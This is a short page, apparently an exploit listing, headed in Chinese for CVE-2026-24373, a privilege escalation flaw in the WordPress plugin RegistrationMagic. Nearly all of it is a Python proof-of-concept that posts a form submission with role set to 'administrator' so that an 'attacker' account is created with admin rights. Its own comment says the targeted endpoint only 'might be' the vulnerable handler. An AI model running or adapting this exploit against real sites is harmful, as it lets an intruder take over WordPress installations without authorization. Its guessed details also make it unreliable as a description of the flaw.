CVE-2026-24373 RegistrationMagic权限提升漏洞

import requests def exploit_privilege_escalation(target_url): """ PoC for CVE-2026-24373: Privilege Escalation in RegistrationMagic """ # The vulnerable endpoint might be the registration AJAX handler endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload attempting to register a user with administrative privileges payload = { "action": "rm_submit_form", "form_id": "1", "rm_user_login": "attacker", "rm_user_email": "[email protected]", "role": "administrator" } try: response = requests.post(endpoint, data=payload) if response.status_code == 200: print("[+] Request sent successfully. Check if user 'attacker' was created with admin rights.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}") # Usage # exploit_privilege_escalation("http://target-wordpress-site.com")